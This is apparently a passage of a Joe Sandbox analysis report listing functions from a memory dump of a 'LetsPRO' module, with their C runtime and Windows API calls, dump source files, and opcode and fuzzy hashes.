                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _strlen$___wtomb_environ__fassign
                                        • String ID:
                                        • API String ID: 1283471604-0
                                        • Opcode ID: ffc45c11f60adbfa921d15dfe459c197233b8865790b91e67f92726b9968a738
                                        • Instruction ID: cce3aa056acd69cfd8c8dab3bf5d1a4f4aa6b993e1a01d56d7fc836581d1fb66
                                        • Opcode Fuzzy Hash: ffc45c11f60adbfa921d15dfe459c197233b8865790b91e67f92726b9968a738
                                        • Instruction Fuzzy Hash: CA01283AA2D55CBBCF218A78D482A4933FCDF23B9CB250426E858C3D04EB20D840CBC0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94A9C5 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C94ABEA: GetCurrentThreadId.KERNEL32 ref: 6C94AC12
                                          • Part of subcall function 6C94ABEA: swprintf.LIBCMT(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,6C94A994,?,?,000000F8), ref: 6C94AC3C
                                          • Part of subcall function 6C94ABEA: vswprintf_s.MSVCR100(00000401,00000401,?,?,?,00000002,?,6C94A994,?,?,000000F8), ref: 6C94AC5E
                                          • Part of subcall function 6C94ABEA: _wcslen.LIBCMT(?,00000401,00000401,?,?,?,00000002,?,6C94A994,?,?,000000F8), ref: 6C94AC64
                                        • _fwprintf.LIBCMT(6C9A3048,?), ref: 6C94AA11
                                          • Part of subcall function 6C9548FC: _errno.MSVCR100(6C954988,0000000C,6C94A882,?), ref: 6C954918
                                          • Part of subcall function 6C9548FC: _invalid_parameter_noinfo.MSVCR100(6C954988,0000000C,6C94A882,?), ref: 6C954923
                                        • __aullrem.LIBCMT ref: 6C94AA28
                                        • fflush.MSVCR100(00000032,00000000), ref: 6C94AA45
                                          • Part of subcall function 6C90EED1: _lock_file.MSVCR100(?,6C90EF18,0000000C), ref: 6C90EEEB
                                          • Part of subcall function 6C90EED1: _fflush_nolock.MSVCR100(?,6C90EF18,0000000C), ref: 6C90EEF7
                                        • OutputDebugStringW.KERNEL32(?), ref: 6C94AA54
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentDebugOutputStringThread__aullrem_errno_fflush_nolock_fwprintf_invalid_parameter_noinfo_lock_file_wcslenfflushswprintfvswprintf_s
                                        • String ID:
                                        • API String ID: 3120632072-0
                                        • Opcode ID: 9a5ec833250f9643cda8f2f0a08a8b9a224d4acfd15148eb5454b1a3b1e1075a
                                        • Instruction ID: 98d6ff8384f4f5b148b04ff27d21487eb1d85337d1baec25255ec0e3f80427a6
                                        • Opcode Fuzzy Hash: 9a5ec833250f9643cda8f2f0a08a8b9a224d4acfd15148eb5454b1a3b1e1075a
                                        • Instruction Fuzzy Hash: 60115E71B09249EFDF88CFA4EC45A9D37B9FF65308F60806AE44192590EF30DA48DB48
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C904757 Relevance: 6.1, APIs: 4, Instructions: 51COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_memset_msizerealloc
                                        • String ID:
                                        • API String ID: 1728161066-0
                                        • Opcode ID: e9daebca06aade536281084be7c2d76c5dcefc4fdb092c88f2616dadf4bc8e52
                                        • Instruction ID: a6b518968fd11a16ced8cf71d555e444d78d0b1d466bbc30216ecc71e9c10d3d
                                        • Opcode Fuzzy Hash: e9daebca06aade536281084be7c2d76c5dcefc4fdb092c88f2616dadf4bc8e52
                                        • Instruction Fuzzy Hash: C6F049373042156FDB144D659CC49AB3B9EEBE26B9B21453EF91886A44DA71C8448E90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C913C94 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(00000000,00000000), ref: 6C92AAD5
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000), ref: 6C92AAE0
                                        • _errno.MSVCR100(00000000,00000000,00000000), ref: 6C92AAE9
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000), ref: 6C92AAF4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2959964966-0
                                        • Opcode ID: a2cdbf1978f6c04df9e46a3e165dec61bffdc4ac6cae5c40e519e86f605991f1
                                        • Instruction ID: c41c2ba3f1330ec679b6c60458699f4a9725cbca15769c161df75b960c5cfbb4
                                        • Opcode Fuzzy Hash: a2cdbf1978f6c04df9e46a3e165dec61bffdc4ac6cae5c40e519e86f605991f1
                                        • Instruction Fuzzy Hash: B411ED32918259DBCB119F34C4143EE7BB5BF0131CF1085A9C8A25BA88DFBAD684CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C938799 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::exception::exception.LIBCMT(?), ref: 6C9387BA
                                          • Part of subcall function 6C9736DA: std::exception::_Copy_str.LIBCMT(6C942185,?,?,6C942185,6C941FF3,?,6C941FF3,00000001), ref: 6C9736F5
                                        • _CxxThrowException.MSVCR100(?,6C9A0D2C), ref: 6C9387CF
                                        • TlsGetValue.KERNEL32(?), ref: 6C9387E0
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C9387F8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_osCopy_strExceptionThrowValuestd::exception::_std::exception::exception
                                        • String ID:
                                        • API String ID: 3937123494-0
                                        • Opcode ID: 80a52fcbb643e5262b33da7ce5c6e31a4d5fd44a2ca194458cd934377ccbece9
                                        • Instruction ID: fd040a3550382287d473a87538ecc3ab79993e1100dc705441fa352bcb3e292d
                                        • Opcode Fuzzy Hash: 80a52fcbb643e5262b33da7ce5c6e31a4d5fd44a2ca194458cd934377ccbece9
                                        • Instruction Fuzzy Hash: 2F014C3A600228ABC704EFB5D488CCEB7BDFF58658300A067E91ADBB11DB30D505CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C938CFE Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C9403E6: TlsGetValue.KERNEL32(6C945C13,?,00000000,?,6C935CE7,00000001), ref: 6C9403EC
                                        • SetEvent.KERNEL32(?), ref: 6C938D50
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C938D62
                                          • Part of subcall function 6C936BA8: _memset.LIBCMT(?,00000000,0000003E,00000002,?), ref: 6C936BC7
                                        • _CxxThrowException.MSVCR100(?,6C9A0D80), ref: 6C938D70
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C938D78
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::unsupported_os::unsupported_os$EventExceptionThrowValue_memset
                                        • String ID:
                                        • API String ID: 3607046972-0
                                        • Opcode ID: 1bc972d240f7eb11c999a564cf190fb2d2bd61ac8a5d31a9673f632bd8b66ab9
                                        • Instruction ID: d68e5aa012e9ec05159e5ccdca094ba8d3f1e5dfbc508ac4c2bf26502f442150
                                        • Opcode Fuzzy Hash: 1bc972d240f7eb11c999a564cf190fb2d2bd61ac8a5d31a9673f632bd8b66ab9
                                        • Instruction Fuzzy Hash: CA0147B09042606BDB29A774D844ADE7BB9EF71358F105A1BE47AD39A0DB30E409C689
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C947DC3 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6C947DED
                                        • GetLastError.KERNEL32(?,00000000,00000000), ref: 6C947DFA
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6C947E12
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,00000000,00000000), ref: 6C947E20
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionLastThrow
                                        • String ID:
                                        • API String ID: 1394060424-0
                                        • Opcode ID: f8c10787b132190c1f093ec61d07fef75f2c42fa2f712c865e8dbcc5eb79b144
                                        • Instruction ID: cebd598293504c4b9f8c5225330b76f67af95168440d821e9c773e012f5a13fc
                                        • Opcode Fuzzy Hash: f8c10787b132190c1f093ec61d07fef75f2c42fa2f712c865e8dbcc5eb79b144
                                        • Instruction Fuzzy Hash: B3011AF1900755AFD3209F6A8CC4967BAECFB142487908E3DE19AD2A40D735E948CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C937E59 Relevance: 6.0, APIs: 4, Instructions: 46timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6C937E80
                                          • Part of subcall function 6C937483: CreateTimerQueue.KERNEL32(00000001,?,?,00000000,?,00000000,F3B6147F,00000000,?,?), ref: 6C9374AB
                                          • Part of subcall function 6C937483: std::exception::exception.LIBCMT(?,00000001,00000001,?,?,00000000), ref: 6C937504
                                          • Part of subcall function 6C937483: _CxxThrowException.MSVCR100(F3B6147F,6C90C8D8,?,00000001,00000001,?,?,00000000), ref: 6C937519
                                        • GetLastError.KERNEL32 ref: 6C937E8D
                                        • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6C937E9F
                                        • DeleteTimerQueueTimer.KERNEL32(00000000,?,00000000), ref: 6C937EA5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Timer$Concurrency@@QueueQueue@details@Shared$CreateDeleteErrorExceptionLastThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 3155262267-0
                                        • Opcode ID: 3364fe4e0fc0448c3b68587223bee8ac42192cf692f5aff7b413128bb84ba897
                                        • Instruction ID: e07b43a7aa38a92a8ab5c8a6f3149d1b02ec0be95acd3b566c49ec1253400456
                                        • Opcode Fuzzy Hash: 3364fe4e0fc0448c3b68587223bee8ac42192cf692f5aff7b413128bb84ba897
                                        • Instruction Fuzzy Hash: B7012632210624DFDB344B14DD84F1A77ADEF55768F101628E52A87AE0DB31FC05CAA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C915BD9 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _strlen.LIBCMT(00000001,?,00000000,00000000,?,6C94C950,?,00000000,00000001,6C9A7C68), ref: 6C915BEF
                                        • malloc.MSVCR100(00000001,00000001,?,00000000,00000000,?,6C94C950,?,00000000,00000001,6C9A7C68), ref: 6C915BF8
                                          • Part of subcall function 6C900263: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537), ref: 6C900293
                                        • strcpy_s.MSVCR100(00000000,00000001,00000001,?,00000000,00000000,?,6C94C950,?,00000000,00000001,6C9A7C68), ref: 6C915C0A
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,00000000,00000001,6C9A7C68), ref: 6C929674
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocHeap__invoke_watson_strlenmallocstrcpy_s
                                        • String ID:
                                        • API String ID: 3151281347-0
                                        • Opcode ID: 87d6e58d8574de31fe10459d55e611a5d218ba07ab0e4c3f36671a46f09e6ade
                                        • Instruction ID: 9a5d19e0fadfa982527e09d0b143ab21429e872dc18614805e0e3fd61f7a5363
                                        • Opcode Fuzzy Hash: 87d6e58d8574de31fe10459d55e611a5d218ba07ab0e4c3f36671a46f09e6ade
                                        • Instruction Fuzzy Hash: 3AF0273331D248BF87100DB99CC4CCF3A9DCBD56A8B16083AFA08C2D00EA25C405C5B0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C940AF1 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C9403E6: TlsGetValue.KERNEL32(6C945C13,?,00000000,?,6C935CE7,00000001), ref: 6C9403EC
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000000,?,?,?,00000000), ref: 6C940B10
                                          • Part of subcall function 6C9381C4: std::exception::exception.LIBCMT(00000000,00000000,?,?,6C940B15,?), ref: 6C9381D8
                                        • _CxxThrowException.MSVCR100(?,6C9A0E68,?,00000000,?,?,?,00000000), ref: 6C940B1E
                                          • Part of subcall function 6C918728: RaiseException.KERNEL32(?,?,6C92F35F,?,?,?,?,?,6C92F35F,?,6C90C8D8,6C9A8518), ref: 6C918767
                                        • TlsSetValue.KERNEL32(00000000), ref: 6C940B39
                                        • TlsSetValue.KERNEL32(00000000,?,?,?,00000000), ref: 6C940B64
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$Exception$Concurrency::unsupported_os::unsupported_osRaiseThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 1973407479-0
                                        • Opcode ID: a73c64c9e3b5b70446c168da3ae90139c46d44d37fbe0fa407f74cb93b6e6aa1
                                        • Instruction ID: 59f8e3cb73ebe25bc8c8de1545c5bcd546bcb5c3f3dda6005c40d6f1f8620f1e
                                        • Opcode Fuzzy Hash: a73c64c9e3b5b70446c168da3ae90139c46d44d37fbe0fa407f74cb93b6e6aa1
                                        • Instruction Fuzzy Hash: 60012B31504294AFCB159B74DC48A8DBBF8EFA4358F114567E05683640EF30D905CBC8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94790B Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C947981: GetLastError.KERNEL32(?,6C94793E,00000000,?), ref: 6C94799E
                                          • Part of subcall function 6C947981: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,6C94793E,00000000,?), ref: 6C9479B6
                                          • Part of subcall function 6C947981: _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,6C94793E,00000000,?), ref: 6C9479C4
                                          • Part of subcall function 6C947981: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,6C94793E,00000000,?), ref: 6C9479D0
                                          • Part of subcall function 6C947981: GetLastError.KERNEL32(?,6C94793E,00000000,?), ref: 6C9479DD
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,00000000,?), ref: 6C947943
                                        • GetLastError.KERNEL32 ref: 6C947950
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C947968
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C947976
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateEventExceptionThrow
                                        • String ID:
                                        • API String ID: 1718773336-0
                                        • Opcode ID: b656ed46aa21730e0d14d2f84103b1920338b59ad720e56c7a163ea23d640d4a
                                        • Instruction ID: a7a133dc51c82e705dbad33159694c55ad451780aaaf28817c5e631824e110e8
                                        • Opcode Fuzzy Hash: b656ed46aa21730e0d14d2f84103b1920338b59ad720e56c7a163ea23d640d4a
                                        • Instruction Fuzzy Hash: 23014BB1900315AFC7209FAA88C499AFBF8FF183447558E3EE15AD3A50D775E808CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9529F5 Relevance: 6.0, APIs: 4, Instructions: 42COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(00000000,00000000,?,6C952B6B,?,000000FF,?,00000000,00000000), ref: 6C952A02
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,6C952B6B,?,000000FF,?,00000000,00000000), ref: 6C952A0D
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • free.MSVCR100(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C952A51
                                        • free.MSVCR100(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C952A59
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4554520-0
                                        • Opcode ID: e80cc2dfc1146a7c6da0b345b41f21ad2af8333d70eb10c7ad21b21c382317bd
                                        • Instruction ID: c58ccbc3861f1b40cf36a7d869ee2fa9f9745219d2f691fd12216e9cf8780e7a
                                        • Opcode Fuzzy Hash: e80cc2dfc1146a7c6da0b345b41f21ad2af8333d70eb10c7ad21b21c382317bd
                                        • Instruction Fuzzy Hash: 1E016D7590010CFBCF129FA0CC05ADD7EB9AF24368F504294B928655A0E772CBA8DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90C6B9 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C90C6C0
                                        • __AdjustPointer.MSVCR100(00000000,?,00000004,6C90C7E1,00000000,?), ref: 6C90C6EF
                                        • __AdjustPointer.MSVCR100(00000000,?,00000001,00000004,6C90C7E1,00000000,?), ref: 6C927237
                                        • memcpy.MSVCR100(?,00000000,00000003,00000004,6C90C7E1,00000000,?,?,?), ref: 6C92725D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AdjustPointer$H_prolog3_catchmemcpy
                                        • String ID:
                                        • API String ID: 738859832-0
                                        • Opcode ID: 7d160b8d0277770baa52a24df5aab3fb1358a465d1925dac0dcebe0ee08ed037
                                        • Instruction ID: 82b17f75f0ad46cad1f53a62c6afdad713d20f301c21b946763f7b88aef2760a
                                        • Opcode Fuzzy Hash: 7d160b8d0277770baa52a24df5aab3fb1358a465d1925dac0dcebe0ee08ed037
                                        • Instruction Fuzzy Hash: C9016D72104204BEEF21AF10DC41BDA7BB9EF20328F108419F95065A70CB72E9A9DB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C91233F Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32(00000000,6C9308C6,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C912342
                                        • _malloc_crt.MSVCR100(00000002,?,?,?,6C910D07,?,6C910D28,0000000C), ref: 6C912371
                                        • memcpy.MSVCR100(00000000,00000000,00000002,?,?,?,6C910D07,?,6C910D28,0000000C), ref: 6C912380
                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,6C910D07,?,6C910D28,0000000C), ref: 6C912389
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: EnvironmentStrings$Free_malloc_crtmemcpy
                                        • String ID:
                                        • API String ID: 202606007-0
                                        • Opcode ID: a82f9f74254e62f80912cee5b8e75beefc050de4acfcabda1637ea984e884bf2
                                        • Instruction ID: 9424ec57135a4b8b425366c8317d803e0652b56f4979b6618009761369ba3805
                                        • Opcode Fuzzy Hash: a82f9f74254e62f80912cee5b8e75beefc050de4acfcabda1637ea984e884bf2
                                        • Instruction Fuzzy Hash: 3CF0827BA095555ACB247B75BC4A897273CDFD3AAC31E0529E415C3E40EA70CA46C2E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C947CE9 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                        Download Yara Rule
                                        APIs
